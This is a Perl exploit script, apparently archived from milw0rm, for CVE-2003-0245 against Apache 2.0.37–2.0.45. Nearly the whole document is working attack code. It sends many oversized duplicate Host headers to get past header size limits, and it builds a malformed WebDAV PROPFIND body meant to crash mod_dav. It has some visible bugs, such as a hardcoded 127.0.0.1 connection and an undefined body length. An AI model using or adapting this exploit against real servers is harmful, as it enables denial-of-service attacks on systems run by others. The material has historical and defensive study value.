Apache 2.0.37 - 2.0.45 APR Exploit - CVE-2003-0245

1. #!/usr/bin/perl
2. #
3. # Apache 2.0.37 - 2.0.45 APR Exploit
4. # Written By Matthew Murphy
5. #
6. # This Perl script will successfully exploit any un-patched Apache 2.x
7. # servers.
8. #
9.  
10. # Base64 Encoder
11. #
12. # If you want authentication with the server via HTTP's lame Basic
13. # auth, put the proper string to encode BASE64 content, and use
14. # '%s' to represent the credentials being encoded.  For instance:
15. #
16. # base64 %s
17. #
18. # would result in:
19. #
20. # base64 userid:password
21. #
22. # If your decoder requires you to use STDIN to pass the password
23. # (no pun intended), set $BASE64_USE_STDIN to nonzero and do not
24. # use '%s' on the command-line.
25. $BASE64_CMD_STRING = "use_base64_encoder_here %s";
26.  
27. # Base64 encoder piping
28. #
29. # If your encoder requires the password to be written to STDIN,
30. # set this to a nonzero value.  NOTE: This requires support for
31. # bi-directional pipes on your OS version.
32. $BASE64_USE_STDIN = 0;
33.  
34. # Base64 encoder input handling
35. #
36. # If your encoder requires a newline after your credentials,
37. # set this to your newline character.
38. $BASE64_WRITE_NL = "";
39.  
40. use IO::Socket;
41. print STDOUT "Apache 2.0 APR Exploit\r\n";
42. print STDOUT "By Matthew Murphy\r\n\r\n";
43. print STDOUT "Enter the hostname/IP address of the server: ";
44. $line = <STDIN>;
45. $host = mychomp($line);
46. print STDOUT "Enter the port of the server \[80\]: ";
47. $line = <STDIN>;
48. $port = mychomp($line);
49. print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
50. $line = <STDIN>;
51. $char = mychomp($line);
52. if ($char == "Y" || $char == "y") {
53.     print STDOUT "What username shall we use: ";
54.     $line = <STDIN>;
55.     $user = mychomp($line);
56.     print STDOUT "What password shall we use: ";
57.     $line = <STDIN>;
58.     $pass = mychomp($line);
59.     $auth = "$user:$pass";
60.     if ($BASE64_USE_STDIN) {
61.         # l33t Perl piping trix; NOTE: This is definitely
62.         # Alpha code! :-)
63.         pipe(STDOUTREAD, STDOUTWRITE);
64.         pipe(STDINREAD, STDINWRITE);
65.         open(OLDSTDIN, "&STDIN");
66.         open(OLDSTDOUT, ">&STDOUT");
67.         open(STDIN, "&STDINREAD");
68.         open(STDOUT, ">&STDOUTWRITE");
69.         close(STDINREAD);
70.         close(STDOUTWRITE);
71.         system($BASE64_CMD_STRING);
72.         open(STDIN, "&OLDSTDIN");
73.         open(STDOUT, "&>OLDSTDOUT");
74.         close(OLDSTDIN);
75.         close(OLDSTDOUT);
76.         print STDINWRITE $auth;
77.         close(STDINWRITE);
78.         read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
79.         close(STDOUTREAD);
80.     } else {
81.         open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
82.         read(READOUTPUT, $base64, 4096); # See above
83.         close(READOUTPUT);
84.     }
85.     # Another hack for dealing with base64 encoders that output
86.     # multi-lined encoded text.  HTTP specifically calls for a
87.     # single line.  Note that this pattern also messes with spaces,
88.     # tabs, etc., but base64 doesn't use those either, so this
89.     # shouldn't matter.
90.     $base64 = join("", split(/ /, $base64));
91. } else {
92.     $base64 = undef;
93. }
94. $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
95. print STDOUT "Exploiting a proxy server \[Y/N\]? ";
96. $line = <STDIN>;
97. $char = mychomp($line);
98. if ($char == "Y" || $char == "y") {
99.     print $f "GET / HTTP/1.1\x0d\x0a";
100.  
101.     # Apache 2.0 tries to limit header inputs, but uses a hash table
102.     # that ultimately concatenates multiple headers of the same name
103.     # together with ", " between them, so:
104.     #
105.     # Host: a
106.     # Host: b
107.     #
108.     # Bypasses Apache's buffer size checks, but ends up as:
109.     #
110.     # Host: a,b
111.     #
112.     # When processed.  Confirm this with a TRACE against your server:
113.     #
114.     # TRACE / HTTP/1.1
115.     # Host: a
116.     # Host: b
117.     #
118.     # The "message/http" body you receive will contain:
119.     #
120.     # TRACE / HTTP/1.1
121.     # Host: a,b
122.     #
123.     # So, for those of you who are confused by this code fragment,
124.     # this is what it ultimately achieves!
125.     for ($i = 0; $i < 10; $i++) {
126.         print $f "Host: ".("A"x2000)."\r\n";
127.     }
128.     if (defined($base64)) {
129.         print $f "Proxy-Authorization: Basic ".$base64."\r\n";
130.     }
131.     print $f "\r\n";
132. } else {
133.     print STDOUT "What resource should be probed: ";
134.     $line = <STDIN>;
135.     $res = mychomp($line);
136.     print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
137.     $line = <STDIN>;
138.     $char = mychomp($line);
139.     if ($char == "Y" || $char == "y") {
140.         # WARNING:
141.         # Another section of alpha code here; mod_dav tends to barf
142.         # if given the smallest inconsistency, and this is not
143.         # exactly well-researched.  If this doesn't work for you,
144.         # target your DAV repository as a typical resource: if
145.         # UseCanonicalName On hasn't been set explicitly, mod_dav
146.         # will choke on that as well.
147.         #
148.         # STunnel should not have issues with this, as you can't
149.         # use a "Host" header in an SSL connection anyway, so
150.         # that is no problem.
151.         #
152.         # Note that if the body is too long, IIS servers will also
153.         # die (assuming of course, that the latest IIS cumulative
154.         # patch has not been applied), as they have had problems
155.         # dealing with WebDAV in the very recent past.
156.  
157.         # XML Body of Request
158.         #
159.         # If everything works, mod_dav will attempt to format a
160.         # message with apr_psprintf() to indicate that our
161.         # namespace is invalid, leading to a crash.
162.         $xmlbody = "<?xml version=\"1.0\"?>\r\n";
163.         $xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
164.         $xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
165.         $xmlbody.= "</D:propfind>";
166.  
167.         # HTTP headers
168.         print $f "PROPFIND $res HTTP/1.1\r\n";
169.         print $f "Host: $host:$port\r\n";
170.         print $f "Depth: 1\r\n";
171.         print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
172.         print $f "Content-Length: ".length($body)."\r\n\r\n";
173.         if (defined($base64)) {
174.             print $f "Authorization: Basic ".$base64."\r\n";
175.         }
176.         print $f "$xmlbody\r\n\r\n";
177.     } else {
178.         # This does *almost* the exact same thing as the mod_proxy
179.         # code, and could be considered wasteful, but a few extra
180.         # CPU cycles never killed anybody. :-(
181.         print $f "GET $res HTTP/1.1\r\n";
182.         for ($i = 0; $i < 10; $i++) {
183.             print $f "Host: ".("A"x2000)."\r\n";
184.         }
185.         if (defined($base64)) {
186.             print $f "Authorization: Basic ".$base64."\r\n";
187.         }
188.         print $f "\r\n";
189.     }
190. }
191. while (defined($ln = <$f>)) {
192.     print STDOUT $ln;
193. }
194. undef $f;
195. exit;
196.  
197. # FIXED: The perl chomp() function is broken on my distro,
198. # so I hacked a fix to work around it.  This note applies
199. # to ActivePerl 5.8.x -- I haven't tried others.  This is
200. # another hackish fix, which seems to be the entire style
201. # of this code.  I'll write better toys when I have time to
202. # write better toys.
203. sub mychomp {
204.     my $data;
205.     my $arg = shift;
206.     my $CRLF;
207.     if ($^O == "MSWin32") {
208.         $CRLF = 1;
209.     } else {
210.         $CRLF = 0;
211.     }
212.     $data = substr($arg, 0, length($arg) - $CRLF);
213.     return $data;
214. }
215.  
216.  
217. # milw0rm.com [2003-06-08]